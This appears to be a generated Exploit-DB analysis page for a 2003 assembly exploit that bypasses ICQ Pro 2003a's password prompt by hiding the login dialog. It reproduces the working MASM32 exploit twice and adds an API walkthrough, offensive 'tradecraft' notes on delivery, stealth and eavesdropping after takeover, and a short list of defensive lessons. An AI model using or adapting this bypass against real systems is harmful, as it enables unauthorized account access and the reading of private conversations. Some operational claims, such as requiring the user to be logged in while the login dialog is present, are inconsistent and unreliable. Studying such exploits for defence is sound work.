By exploitdb papers bot•July 9, 2003•

papers

ICQ Pro 2003a Password Bypass Exploit Analysis

What this paper is

This paper presents an assembly exploit for ICQ Pro 2003a, specifically targeting a vulnerability that allows bypassing the password authentication mechanism. The exploit works by manipulating ICQ's window handles to bypass the login screen, enabling a user to log in to the ICQ server with any registered account without needing the correct password. The vulnerability is present in ICQ Pro 2003a Build #3800.

Simple technical breakdown

The exploit operates by finding specific windows related to the ICQ login process. It then manipulates these windows to effectively bypass the password prompt. The core idea is to interact with the ICQ application's user interface elements through Windows API calls, tricking it into thinking the login process has been completed successfully without actual password verification.

The exploit identifies two possible window titles: "Password Verification" and "Login to server". It then finds the parent window of the login dialog and enables it. Finally, it hides the login window and exits the exploit process, leaving ICQ logged in.

Complete code and payload walkthrough

The provided code is an assembly program written for MASM32. It uses Windows API functions to interact with the ICQ application.

; <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
;         CUT HERE - CUTE HERE - ca1-icq.asm - CUT HERE - CUT HERE      BOF
; -------------------------------------------------------------------------
;
;  07/02/2003 - ca1-icq.asm
;  ICQ Password Bypass exploit.
;  written by Caua Moura Prado (aka ca1)
;
;  This exploit allows you to login to ICQ server using any account registered *locally*
;  no matter the 'save password' option is checked or not. High level security is also bypassed.
;  All you have to do is run the exploit and set status property using your mouse when the flower
;  is yellow. If you accidentally set status to offline then you will need to restart ICQ and run
;  the exploit again.
;
;        uh-oh!
;         ___
;      __/   \__
;     /  \___/  \        Vulnerable:
;     \__/+ +\__/          ICQ Pro 2003a Build #3800
;     /   ~~~   \
;     \__/   \__/        Not Vulnerable:
;        \___/                ICQ Lite alpha Build 1211
;                               ICQ 2001b and ICQ 2002a
;    tHe Flaw Power       All other versions were not tested.
;                                                      
                           coded with masm32
; ________________________________________________________________exploit born in .br

.386
.model flat, stdcall
option casemap:none
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
.data
szTextHigh byte 'Password Verification', 0
szTextLow byte 'Login to server', 0
szClassName byte '#32770', 0
.data?
hWndLogin dword ?
.code
_entrypoint:
 invoke FindWindow, addr szClassName, addr szTextHigh
 mov hWndLogin, eax
 .if hWndLogin == 0
   invoke FindWindow, addr szClassName, addr szTextLow
   mov hWndLogin, eax
 .endif
 invoke GetParent, hWndLogin
 invoke EnableWindow, eax, 1      ;Enable ICQ contact
list
 invoke ShowWindow, hWndLogin, 0  ;get rid of Login
screen (don't kill this window)
 invoke ExitProcess, 0            ;uhuu.. cya! i gotta
sleep!
end _entrypoint

; <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
;         CUT HERE - CUTE HERE - ca1-icq.asm - CUT HERE - CUT HERE      EOF
; -------------------------------------------------------------------------



; milw0rm.com [2003-07-09]
-----

Code Breakdown:

.386, .model flat, stdcall, option casemap:none: These are assembler directives.
- .386: Specifies that the code uses instructions for the Intel 80386 processor.
- .model flat, stdcall: Defines the memory model and calling convention. flat means a single 4GB memory space, and stdcall is a common calling convention for Windows API functions.
- option casemap:none: Makes identifiers case-sensitive.
include \masm32\include\user32.inc, include \masm32\include\kernel32.inc: These lines include header files that define the structures, constants, and function prototypes for the Windows User32 and Kernel32 libraries.
includelib \masm32\lib\user32.lib, includelib \masm32\lib\kernel32.lib: These lines link against the import libraries for User32 and Kernel32, allowing the program to call functions from these DLLs.
.data section:
- szTextHigh byte 'Password Verification', 0: Defines a null-terminated string for the window title "Password Verification".
- szTextLow byte 'Login to server', 0: Defines a null-terminated string for the window title "Login to server".
- szClassName byte '#32770', 0: Defines a null-terminated string for the window class name '#32770'. This is a common class name for dialog boxes in Windows applications.
.data? section:
- hWndLogin dword ?: Declares a variable hWndLogin of type dword (double word, 32 bits) to store a window handle. The ? indicates it's uninitialized.
.code section:
- _entrypoint:: This is the label for the program's entry point.
- invoke FindWindow, addr szClassName, addr szTextHigh:
  - Purpose: This is the first attempt to find the ICQ login window.
  - Function: FindWindow is a Windows API function that searches for a top-level window with a specific class name and window title.
  - Arguments:
    - addr szClassName: The class name of the window to find (#32770).
    - addr szTextHigh: The window title to find (Password Verification).
  - Behavior: It searches for a window matching these criteria.
  - Output: The handle to the found window is returned in the EAX register. If no window is found, EAX will be 0.
- mov hWndLogin, eax:
  - Purpose: Stores the result of the FindWindow call into the hWndLogin variable.
  - Behavior: If a window was found, its handle is saved.
- .if hWndLogin == 0:
  - Purpose: Checks if the first FindWindow call failed (i.e., hWndLogin is 0).
  - Behavior: If the "Password Verification" window wasn't found, the code inside this block will execute.
- invoke FindWindow, addr szClassName, addr szTextLow:
  - Purpose: If the first FindWindow failed, this attempts to find the login window using an alternative title.
  - Function: FindWindow.
  - Arguments:
    - addr szClassName: The class name (#32770).
    - addr szTextLow: The alternative window title (Login to server).
  - Behavior: Searches for a window matching these criteria.
  - Output: The handle to the found window is returned in EAX.
- mov hWndLogin, eax:
  - Purpose: Stores the result of the second FindWindow call into hWndLogin.
  - Behavior: If the alternative window was found, its handle is saved.
- .endif: Ends the conditional block.
- invoke GetParent, hWndLogin:
  - Purpose: Retrieves the parent window handle of the found login window. This is often necessary to manipulate controls or the window itself.
  - Function: GetParent.
  - Arguments: hWndLogin (the handle of the login dialog).
  - Behavior: Gets the handle of the parent window.
  - Output: The parent window handle is returned in EAX.
- invoke EnableWindow, eax, 1:
  - Purpose: Enables the parent window. The comment suggests this is to "Enable ICQ contact list". This might be a side effect or a way to ensure the main ICQ window is active and responsive.
  - Function: EnableWindow.
  - Arguments:
    - eax: The handle of the parent window (obtained from GetParent).
    - 1: A boolean value indicating to enable the window (TRUE).
  - Behavior: Makes the parent window enabled and interactive.
- invoke ShowWindow, hWndLogin, 0:
  - Purpose: Hides the login window. The comment states "get rid of Login screen (don't kill this window)".
  - Function: ShowWindow.
  - Arguments:
    - hWndLogin: The handle of the login dialog window.
    - 0: A flag indicating to hide the window and deactivate it. SW_HIDE is often represented by 0.
  - Behavior: Makes the login dialog invisible.
- invoke ExitProcess, 0:
  - Purpose: Terminates the exploit process. The comment humorously states "uhuu.. cya! i gotta sleep!".
  - Function: ExitProcess.
  - Arguments: 0: The exit code for the process (0 typically indicates success).
  - Behavior: The exploit program itself terminates.
- end _entrypoint: Marks the end of the assembly code and specifies the entry point.

Payload/Shellcode Explanation:

There is no distinct shellcode or payload in the traditional sense (like code injected into another process or executed remotely). The provided assembly code is the exploit. It's a standalone executable that, when run, interacts with the ICQ application's running instance on the local machine.

Mapping:

FindWindow, addr szClassName, addr szTextHigh -> Locate the primary login dialog window.
FindWindow, addr szClassName, addr szTextLow -> Locate an alternative login dialog window if the first fails.
GetParent, hWndLogin -> Obtain the handle to the main ICQ window or a window that controls the login state.
EnableWindow, eax, 1 -> Ensure the main ICQ interface is active and responsive, potentially allowing the bypass to take effect.
ShowWindow, hWndLogin, 0 -> Make the login dialog invisible, effectively bypassing the user's interaction with it.
ExitProcess, 0 -> Terminate the exploit program itself after performing its actions.

Practical details for offensive operations teams

Required Access Level: Local Administrator privileges are generally not required. The exploit targets a running instance of ICQ Pro 2003a and interacts with its windows. Standard user privileges sufficient to run applications and interact with the GUI should be enough.
Lab Preconditions:
- A target machine with ICQ Pro 2003a Build #3800 installed and running.
- The target user must be logged into the ICQ client.
- The exploit must be executed on the same machine where ICQ is running.
- The exploit expects the ICQ login dialog to be present or triggerable.
Tooling Assumptions:
- Assembler: MASM32 assembler is required to compile the .asm source code into an executable.
- Linker: The MASM32 linker (ml.exe and link.exe) will be used.
- Execution Environment: A Windows environment (likely Windows XP or similar, given the exploit's age) where ICQ Pro 2003a can run.
Execution Pitfalls:
- ICQ Version Mismatch: The exploit is highly specific to ICQ Pro 2003a Build #3800. Different versions will likely not be vulnerable.
- ICQ Not Running: If ICQ is not running, FindWindow will fail, and the exploit will likely exit without effect.
- Login Dialog Not Present: If the user has already logged in and the login dialog is not displayed, the exploit might not find the target windows.
- Window Titles Changed: If the user or application has modified the default window titles, the FindWindow calls will fail.
- Race Conditions: While not explicitly detailed, there's a potential for race conditions if ICQ is in the process of closing or opening windows rapidly.
- Antivirus/Endpoint Detection: Modern AV solutions might flag the FindWindow, ShowWindow, and ExitProcess API calls, especially if the executable is not signed or is known.
- User Interaction Required (Implied): The original paper mentions "set status property using your mouse when the flower is yellow." This implies that after running the exploit, the user might still need to perform a specific action within ICQ for the bypass to be fully effective or for the connection to establish properly. This is a crucial detail for operational planning.
Tradecraft Considerations:
- Delivery: The .asm file needs to be compiled into an .exe. This executable would then need to be delivered to the target machine and executed.
- Stealth: The exploit itself is a short-lived process that terminates after execution. Its primary impact is on the ICQ application. The act of running an .exe is the main detectable event.
- Persistence: This exploit does not provide persistence. It's a one-shot action.
- Post-Exploitation: Once the bypass is successful, the attacker can log into ICQ as the target user without a password. This allows for eavesdropping on conversations, sending messages, or accessing contact lists.

Where this was used and when

Context: This exploit targets a specific vulnerability in ICQ Pro 2003a. It was likely used by individuals or groups interested in unauthorized access to ICQ accounts for purposes such as espionage, social engineering, or simply to gain access to a user's contact list and communications.
Timeframe: The exploit was published on July 9, 2003. Therefore, its usage would have been primarily in the early to mid-2000s, coinciding with the popularity of ICQ as a messaging platform. It's unlikely to be relevant against modern ICQ versions or other contemporary messaging applications due to significant changes in security and application architecture.

Defensive lessons for modern teams

Vulnerability Specificity: Exploits are often highly specific to application versions and build numbers. Keeping software updated is paramount.
Window Management Vulnerabilities: Applications that rely on manipulating window handles and properties for authentication can be susceptible to UI-level bypasses. Robust authentication should not depend on the visibility or state of UI elements.
Input Validation: While this exploit bypasses password authentication, it highlights the importance of validating all inputs and states within an application.
Principle of Least Privilege: Running applications with elevated privileges can increase the impact of vulnerabilities.
Endpoint Detection and Response (EDR): Modern EDR solutions can detect the suspicious API calls (FindWindow, ShowWindow, EnableWindow, ExitProcess) made by such exploits, especially when combined with behavioral analysis.
Application Sandboxing/Isolation: Running applications in sandboxed environments can limit their ability to interact with other processes or the operating system in unexpected ways.
Code Signing: Unsigned executables or executables from untrusted sources should be treated with extreme caution.

ASCII visual (if applicable)

This exploit's operation is primarily focused on manipulating the Windows message queue and window handles. A visual representation of the process flow would be:

+-------------------+       +-------------------+       +-------------------+
| Exploit Executable| ----> | FindWindow (Title1)| ----> | Found Window Handle |
| (ICQ Pro 2003a)   |       | or (Title2)       |       | (hWndLogin)         |
+-------------------+       +-------------------+       +-------------------+
        |                                                       |
        |                                                       |
        |                                                       v
        |                                               +-------------------+
        |                                               | GetParent         |
        |                                               +-------------------+
        |                                                       |
        |                                                       v
        |                                               +-------------------+
        |                                               | EnableWindow      |
        |                                               | (Parent Window)   |
        |                                               +-------------------+
        |                                                       |
        |                                                       v
        |                                               +-------------------+
        |                                               | ShowWindow        |
        |                                               | (Login Dialog)    |
        |                                               +-------------------+
        |                                                       |
        |                                                       v
        +---------------------------------------------> +-------------------+
                                                          | ExitProcess       |
                                                          +-------------------+

This diagram illustrates the sequential API calls made by the exploit to locate, manipulate, and then hide the ICQ login window, ultimately allowing the application to proceed without proper authentication.

Source references

Paper ID: 52
Paper Title: ICQ Pro 2003a - 'ca1-icq.asm' Password Bypass
Author: Caua Moura Prado
Published: 2003-07-09
Keywords: Windows, local
Paper URL: https://www.exploit-db.com/papers/52
Raw URL: https://www.exploit-db.com/raw/52

Original Exploit-DB Content (Verbatim)

; <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
;         CUT HERE - CUTE HERE - ca1-icq.asm - CUT HERE - CUT HERE      BOF 
; -------------------------------------------------------------------------
;
;  07/02/2003 - ca1-icq.asm 
;  ICQ Password Bypass exploit.
;  written by Caua Moura Prado (aka ca1)
; 
;  This exploit allows you to login to ICQ server using any account registered *locally*
;  no matter the 'save password' option is checked or not. High level security is also bypassed. 
;  All you have to do is run the exploit and set status property using your mouse when the flower
;  is yellow. If you accidentally set status to offline then you will need to restart ICQ and run 
;  the exploit again. 
;
;        uh-oh!
;         ___     
;      __/   \__  
;     /  \___/  \        Vulnerable:
;     \__/+ +\__/          ICQ Pro 2003a Build #3800
;     /   ~~~   \
;     \__/   \__/        Not Vulnerable:
;        \___/                ICQ Lite alpha Build 1211
;                               ICQ 2001b and ICQ 2002a 
;    tHe Flaw Power       All other versions were not tested.                       
;                                                      
                           coded with masm32
; ________________________________________________________________exploit born in .br
        
.386
.model flat, stdcall
option casemap:none
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
.data
szTextHigh byte 'Password Verification', 0 
szTextLow byte 'Login to server', 0
szClassName byte '#32770', 0
.data?
hWndLogin dword ?
.code
_entrypoint:
 invoke FindWindow, addr szClassName, addr szTextHigh
 mov hWndLogin, eax  
 .if hWndLogin == 0
   invoke FindWindow, addr szClassName, addr szTextLow
   mov hWndLogin, eax
 .endif 
 invoke GetParent, hWndLogin 
 invoke EnableWindow, eax, 1      ;Enable ICQ contact 
list
 invoke ShowWindow, hWndLogin, 0  ;get rid of Login 
screen (don't kill this window)
 invoke ExitProcess, 0            ;uhuu.. cya! i gotta 
sleep!
end _entrypoint

; <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
;         CUT HERE - CUTE HERE - ca1-icq.asm - CUT HERE - CUT HERE      EOF 
; -------------------------------------------------------------------------



; milw0rm.com [2003-07-09]